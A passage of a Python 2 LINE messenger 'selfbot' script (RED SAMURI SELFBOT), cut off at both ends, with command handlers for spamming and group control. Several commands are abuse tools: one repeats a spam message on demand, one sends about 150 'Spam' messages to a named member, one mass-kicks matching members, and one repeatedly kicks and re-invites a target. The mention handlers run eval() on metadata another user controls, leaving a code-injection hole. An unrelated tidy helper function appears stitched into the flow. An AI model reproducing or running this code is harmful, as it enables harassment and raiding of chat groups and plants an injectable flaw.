cl.sendText(msg.to,"Backup:off") cl.sendText(msg.to,"Read:off") cl.sendText(msg.to,"Respon:off") cl.sendText(msg.to,"Responkick:off") cl.sendText(msg.to,"Protect:off") cl.sendText(msg.to,"Namelock:off") cl.sendText(msg.to,"Blockinvite:off") cl.sendText(msg.to,"Link off") #======================================================# elif msg.text in ["Set1","เช็ค1"]: md = "一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一\n" if wait["contact"] == True: md+="􀜁􀇔􏿿 Contact:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="􀜁􀇔􏿿 Auto Join:on 􀜁􀄯􏿿\n" else: md +="􀜁􀇔􏿿 Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="􀜁􀇔􏿿 Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+= "􀜁􀇔􏿿 Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="􀜁􀇔􏿿 Auto leave:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Auto leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="􀜁􀇔􏿿 Share:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 
Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="􀜁􀇔􏿿 Auto add:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto add:off 􀜁��􏿿\n" if wait["commentOn"] == True: md+="􀜁􀇔􏿿 Auto komentar:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto komentar:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="􀜁􀇔􏿿 Protect:on 🔓\n" else:md+="􀜁􀇔􏿿 Protect:off 🔒\n" if wait["linkprotect"] == True: md+="􀜁􀇔􏿿Link Protect:on 🔓\n" else:md+="􀜁􀇔􏿿 Link Protect:off🔒\n" if wait["inviteprotect"] == True: md+="􀜁􀇔􏿿Invitation Protect:on🔓\n" else:md+="􀜁􀇔􏿿 Invitation Protect:off🔒\n" if wait["cancelprotect"] == True: md+"􀜁􀇔􏿿 CancelProtect:on 🔓\n" else:md+="􀜁􀇔􏿿 Cancel Protect:off 🔒\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': admin} cl.sendMessage(msg) #======================================================# elif msg.text in ["Set2","เช็ค2"]: print "Setting pick up..." md = "一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一\n" if wait["likeOn"] == True: md+="􀬁􀆐􏿿 Auto like : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Auto like : off 􀜁􀄰􏿿\n" if wait["alwayRead"] == True: md+="􀬁􀆐􏿿 Read : on 􀜁􀄯􏿿\n" else:md+="􀬁��􏿿 Read : off 􀜁􀄰􏿿\n" if wait["detectMention"] == True: md+="􀬁􀆐􏿿 Autorespon : on 􀜁􀄯􏿿\n" else:md+="􀬁??􏿿 Autorespon : off 􀜁􀄰􏿿\n" if wait["kickMention"] == True: md+="􀬁􀆐􏿿 Autokick: on 􀜁����􏿿\n" else:md+="􀬁􀆐􏿿 Autokick : off 􀜁􀄰􏿿\n" if wait["Notifed"] == True: md+="􀬁􀆐􏿿 Notifed : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Notifed : off 􀜁􀄰􏿿\n" if wait["Notifedbot"] == True: md+="􀬁􀆐􏿿 Notifedbot : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Notifedbot : off 􀜁􀄰􏿿\n" if wait["acommentOn"] == True: md+="􀬁􀆐􏿿 Hhx1 : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Thx1 : off 􀜁􀄰􏿿\n" if wait["bcommentOn"] == True: md+="􀬁􀆐􏿿 Hhx2 : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Thx2 : off 􀜁􀄰􏿿\n" if wait["ccommentOn"] == True: md+="􀬁􀆐􏿿 Hhx3 : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Thx3 : off 􀜁􀄰􏿿\n" if wait["Protectcancl"] == True: md+="􀬁􀆐􏿿 Cancel : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Cancel : off 􀜁􀄰􏿿\n" if wait["winvite"] == True: md+="􀬁􀆐􏿿 Invite : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Invite : off 􀜁􀄰􏿿\n" if wait["pname"] == True: md+="􀬁􀆐􏿿 Namelock : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Namelock : off 􀜁􀄰􏿿\n" if wait["contact"] == True: md+="􀬁􀆐􏿿 Contact : on 􀜁􀄯􏿿\n" else: md+="􀬁􀆐􏿿 Contact : off 􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="􀬁􀆐􏿿 Auto join : on 􀜁􀄯􏿿\n" else: md +="􀬁􀆐􏿿 Auto join : off 􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="􀬁􀆐􏿿 Group cancel :" + str(wait["autoCancel"]["members"]) + " 􀜁􀄯􏿿\n" else: md+= "􀬁􀆐􏿿 Group cancel : off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="􀬁􀆐􏿿 Auto leave : on 􀜁􀄯􏿿\n" else: md+="􀬁􀆐􏿿 Auto leave : off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="􀬁􀆐􏿿 Share : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Share : off 􀜁􀄰􏿿\n" if wait["clock"] == True: md+="􀬁􀆐􏿿 Clock Name : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Clock Name : off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="􀬁􀆐􏿿 Auto add : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Auto add : off 􀜁􀄰􏿿\n" if wait["commentOn"] == True: md+="􀬁􀆐􏿿 Comment : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Comment : off 􀜁􀄰􏿿\n" if wait["Backup"] == True: md+="􀬁􀆐􏿿 Backup : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Backup : off 􀜁􀄰􏿿\n" if wait["qr"] == True: md+="􀬁􀆐􏿿 Protect QR : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Protect QR : off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': admin} cl.sendMessage(msg) #======================================================# elif msg.text.lower() == 'เช็ค': md = "" if wait["contact"] == True: md+="Contact:on 􀜁􀄯􏿿\n" else: md+="Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="Auto Join:on 􀜁􀄯􏿿\n" else: md +="Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+= "Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="Auto leave:on 􀜁􀄯􏿿\n" 
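# --- Illustrative sketch (not part of the original flow) ----------------------
# The Set1 / Set2 / เช็ค reports above build their status text with one
# hand-written if/else pair per flag.  The same summary can be produced from a
# table of (label, key) pairs; a minimal sketch over flags that the wait dict
# in this file actually carries:
def build_status_report(wait_flags):
    rows = [
        ("Contact", "contact"),
        ("Auto Join", "autoJoin"),
        ("Auto leave", "leaveRoom"),
        ("Share", "timeline"),
        ("Auto add", "autoAdd"),
        ("Protect", "protect"),
        ("Link Protect", "linkprotect"),
        ("Invitation Protect", "inviteprotect"),
        ("Cancel Protect", "cancelprotect"),
    ]
    lines = []
    for label, key in rows:
        state = "on" if wait_flags.get(key) else "off"
        lines.append("%s: %s" % (label, state))
    return "\n".join(lines)
# ------------------------------------------------------------------------------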
else: md+="Auto leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="Share:on 􀜁􀄯􏿿\n" else:md+="Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="Auto add:on 􀜁􀄯􏿿\n" else:md+="Auto add:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="Protect:on 􀜁􀄯􏿿\n" else:md+="Protect:off 􀜁􀄰􏿿\n" if wait["linkprotect"] == True: md+="Link Protect:on 􀜁􀄯􏿿\n" else:md+="Link Protect:off 􀜁􀄰􏿿\n" if wait["inviteprotect"] == True: md+="Invitation Protect:on 􀜁􀄯􏿿\n" else:md+="Invitation Protect:off 􀜁􀄰􏿿\n" if wait["cancelprotect"] == True: md+="Cancel Protect:on 􀜁􀄯􏿿\n" else:md+="Cancel Protect:off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif cms(msg.text,["ผส","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "ub5abe828cd964292195c3c59d6322033"} cl.sendMessage(msg) kk.sendMessage(msg) elif msg.text.lower() == 'เปิดแอด': if wait["autoAdd"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") else: wait["autoAdd"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") elif msg.text.lower() == 'ปิดแอด': if wait["autoAdd"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") else: wait["autoAdd"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") elif "Pesan set:" in msg.text: wait["message"] = msg.text.replace("Pesan set:","") cl.sendText(msg.to,"We changed the message") elif msg.text.lower() == 'pesan cek': if wait["lang"] == "JP": cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) else: cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) elif "Come Set:" in msg.text: c = msg.text.replace("Come Set:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah") else: wait["comment"] = c cl.sendText(msg.to,"Ini telah diubah\n\n" + c) elif msg.text in ["Com on","เปิดเม้น","Comment on"]: if wait["commentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Aku berada di") else: cl.sendText(msg.to,"To open") else: wait["commentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Comment Actived") else: cl.sendText(msg.to,"Comment Has Been Active") elif msg.text in ["Come off","ปิดเม้น"]: if wait["commentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Hal ini sudah off") else: cl.sendText(msg.to,"It is already turned off") else: wait["commentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Off") else: cl.sendText(msg.to,"To turn off") elif msg.text in ["Com","Comment"]: cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"])) elif msg.text in ["Com Bl"]: wait["wblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist") elif msg.text in ["Com hapus Bl"]: wait["dblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist") elif msg.text in ["Com Bl cek"]: if wait["commentBlack"] == {}: cl.sendText(msg.to,"Nothing in the blacklist") else: cl.sendText(msg.to,"The following is a blacklist") mc = "" for mi_d in wait["commentBlack"]: mc += "・" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text.lower() == 'jam on': if wait["clock"] == True: 
cl.sendText(msg.to,"Jam already on") else: wait["clock"] = True now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Jam set on") elif msg.text.lower() == 'jam off': if wait["clock"] == False: cl.sendText(msg.to,"Jam already off") else: wait["clock"] = False cl.sendText(msg.to,"Jam set off") elif "Jam say:" in msg.text: n = msg.text.replace("Jam say:","") if len(n.decode("utf-8")) > 30: cl.sendText(msg.to,"terlalu lama") else: wait["cName"] = n cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n) elif msg.text.lower() == 'update': if wait["clock"] == True: now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Diperbarui") else: cl.sendText(msg.to,"Silahkan Aktifkan Jam") elif "รูป " in msg.text: search = msg.text.replace("รูป ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass #========================== FOR COMMAND BOT FINISHED =============================# elif "Spam change:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam change:","") cl.sendText(msg.to,"spam changed") elif "Spam add:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam add:","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam:" in msg.text: if msg.toType == 2: strnum = msg.text.replace("Spam:","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) #===================================== elif "พูด " in msg.text: if msg.toType == 2: bctxt = msg.text.replace("พูด ", "") t = cl.getAllContactIds() t = 5 while(t): cl.sendText(msg.to, (bctxt)) t-=1 elif "Red say " in msg.text: bctxt = msg.text.replace("Red say ","") ki.sendText(msg.to,(bctxt)) elif "siri-en " in msg.text.lower(): query = msg.text.lower().replace("siri-en ","") with requests.session() as s: s.headers['user-agent'] = 'Mozilla/5.0' url = 'https://google-translate-proxy.herokuapp.com/api/tts' params = {'language': 'en', 'speed': '1', 'query': query} r = s.get(url, params=params) mp3 = r.url cl.sendAudioWithUrl(msg.to, mp3) #============================================== elif "รันแชท @" in msg.text: _name = msg.text.replace("รันแชท @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") 
cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(g.mid,"Spam") cl.sendText(msg.to, "Done") print " Spammed !" 
elif msg.text in ["ลบรัน"]: gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว") elif msg.text in ["ลบแชท","ล้างแชท"]: cl.removeAllMessages(op.param2) cl.sendText(msg.to,"❇️Delete Chat Bot❇️") #==============================================================================# elif msg.text in ["Invite"]: wait["invite"] = True cl.sendText(msg.to,"ส่งคทด้วย") elif msg.text in ["อ่านคท"]: wait["contact"] = True cl.sendText(msg.to,"จัดมาโล๊ด") elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama print "[Command]Like executed" cl.sendText(msg.to,"Like Status Owner") try: likeme() except: pass elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman print "[Command]Like executed" cl.sendText(msg.to,"Like Status Teman") try: likefriend() except: pass elif msg.text in ["เปิดไลค์","Like on"]: if wait["likeOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"จัดไป") else: wait["likeOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"จัดไป") elif msg.text in ["ปิดไลค์","Like:off"]: if wait["likeOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ตามนั้น") else: wait["likeOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ตามนั้น") elif msg.text in ["Simisimi on","Simisimi:on"]: settings["simiSimi"][msg.to] = True cl.sendText(msg.to,"เปิดโหมดโต้ตอบ") elif msg.text in ["Simisimi off","Simisimi:off"]: settings["simiSimi"][msg.to] = False cl.sendText(msg.to,"ปิดโหมดโต้ตอบแล้ว") elif msg.text in ["Autoread on","Read:on"]: wait['alwayRead'] = True cl.sendText(msg.to,"Auto read On") elif msg.text in ["Autoread off","Read:off"]: wait['alwayRead'] = False cl.sendText(msg.to,"Auto read Off") elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]: wait["detectMention"] = True cl.sendText(msg.to,"Auto respon tag On") elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]: wait["detectMention"] = False cl.sendText(msg.to,"Auto respon tag Off") elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]: wait["kickMention"] = True cl.sendText(msg.to,"Auto Kick tag ON") elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]: wait["kickMention"] = False cl.sendText(msg.to,"Auto Kick tag OFF") elif "Time" in msg.text: if msg.toType == 2: cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S')) #==============================================================================# elif "Clearall" in msg.text: if msg.toType == 2: if msg.toType == 2: print "ok" _name = msg.text.replace("Clearall","") gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) gs = cl.getGroup(msg.to) cl.sendText(msg.to,"Group Cleared.") targets = [] for g in gs.members: if _name in g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Not found.") cl.sendText(msg.to,"Not found.") else: for target in targets: try: klist=[cl,cl,cl] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: cl.sendText(msg.to,"หาหมอมั้ย") cl.sendText(msg.to,"หาหมอมั้ย") elif ("หวด " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif ("หวัดดี " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"] [0] ["M"] for x in key["MENTIONEES"]: 
targets.append(x["M"]) for target in targets: try: cl.kickoutFromGroup(msg.to,[target]) cl.inviteIntoGroup(msg.to,[target]) cl.cancelGroupInvitation(msg.to,[target]) cl.inviteIntoGroup(msg.to,[target]) except: cl.sendText(msg.to,"Error") elif "Kick: " in msg.text: midd = msg.text.replace("Kick: ","") cl.kickoutFromGroup(msg.to,[midd]) elif 'ดึง' in msg.text.lower(): key = msg.text[-33:] cl.findAndAddContactsByMid(key) cl.inviteIntoGroup(msg.to, [key]) contact = cl.getContact(key) elif msg.text.lower() == 'cancel': if msg.toType == 2: group = cl.getGroup(msg.to) if group.invitee is not None: gInviMids = [contact.mid for contact in group.invitee] cl.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Tidak ada undangan") else: cl.sendText(msg.to,"Invitan tidak ada") elif msg.text.lower() == 'เปิดลิ้ง': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = False cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL open") else: cl.sendText(msg.to,"URL open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text.lower() == 'ปิดลิ้ง': if msg.toType == 2: group = cl.getGroup(msg.to) group.preventJoinByTicket = True cl.updateGroup(group) if wait["lang"] == "JP": cl.sendText(msg.to,"URL close") else: cl.sendText(msg.to,"URL close") else: if wait["lang"] == "JP": cl.sendText(msg.to,"It can not be used outside the group") else: cl.sendText(msg.to,"Can not be used for groups other than") elif msg.text in ["Url","Gurl"]: if msg.toType == 2: g = cl.getGroup(msg.to) if g.preventJoinByTicket == True: g.preventJoinByTicket = False cl.updateGroup(g) gurl = cl.reissueGroupTicket(msg.to) cl.sendText(msg.to,"line://ti/g/" + gurl) elif "Gcreator" == msg.text: try: group = cl.getGroup(msg.to) GS = group.creator.mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': GS} cl.sendMessage(M) except: W = group.members[0].mid M = Message() M.to = msg.to M.contentType = 13 M.contentMetadata = {'mid': W} cl.sendMessage(M) cl.sendText(msg.to,"Creator Grup") elif msg.text.lower() == 'ดึง:ผส': if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: gcmid = ginfo.creator.mid except: gcmid = "Error" if wait["lang"] == "JP": cl.inviteIntoGroup(msg.to,[gcmid]) else: cl.inviteIntoGroup(msg.to,[gcmid]) elif ("Gname: " in msg.text): if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Gname: ","") cl.updateGroup(X) elif msg.text.lower() == 'infogrup': group = cl.getGroup(msg.to) try: gCreator = group.creator.displayName except: gCreator = "Error" md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) elif msg.text.lower() == 'grup id': gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[%s]:%s\n" % (cl.getGroup(i).name,i) cl.sendText(msg.to,h) 
#==============================================================================# elif msg.text in ["Glist"]: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]") cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]") elif msg.text.lower() == 'gcancel': gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"Aku menolak semua undangan") else: cl.sendText(msg.to,"He declined all invitations") elif "Auto add" in msg.text: thisgroup = cl.getGroups([msg.to]) Mids = [contact.mid for contact in thisgroup[0].members] mi_d = Mids[:33] cl.findAndAddContactsByMids(mi_d) cl.sendText(msg.to,"Berhasil add semua") elif "@bye" in msg.text: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: cl.leaveGroup(msg.to) except: pass #==============================================================================# elif "ใครแทค" == msg.text.lower(): group = cl.getGroup(msg.to) nama = [contact.mid for contact in group.members] nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama) if jml <= 100: summon(msg.to, nama) if jml > 100 and jml < 200: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, len(nama)-1): nm2 += [nama[j]] summon(msg.to, nm2) if jml > 200 and jml < 500: for i in range(0, 99): nm1 += [nama[i]] summon(msg.to, nm1) for j in range(100, 199): nm2 += [nama[j]] summon(msg.to, nm2) for k in range(200, 299): nm3 += [nama[k]] summon(msg.to, nm3) for l in range(300, 399): nm4 += [nama[l]] summon(msg.to, nm4) for m in range(400, len(nama)-1): nm5 += [nama[m]] summon(msg.to, nm5) if jml > 500: print "Terlalu Banyak Men 500+" cnt = Message() cnt.text = "Jumlah:\n" + str(jml) + " Members" cnt.to = msg.to cl.sendMessage(cnt) elif "Sider on" in msg.text: try: del cctv['point'][msg.to] del cctv['sidermem'][msg.to] del cctv['cyduk'][msg.to] except: pass cctv['point'][msg.to] = msg.id cctv['sidermem'][msg.to] = "" cctv['cyduk'][msg.to]=True wait["Sider"] = True cl.sendText(msg.to,"Siap On Cek Sider") elif "Sider off" in msg.text: if msg.to in cctv['point']: cctv['cyduk'][msg.to]=False wait["Sider"] = False cl.sendText(msg.to, "Cek Sider Off") else: cl.sendText(msg.to, "Heh Belom Di Set") elif "จับ" == msg.text.lower(): if msg.to in wait2['readPoint']: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with 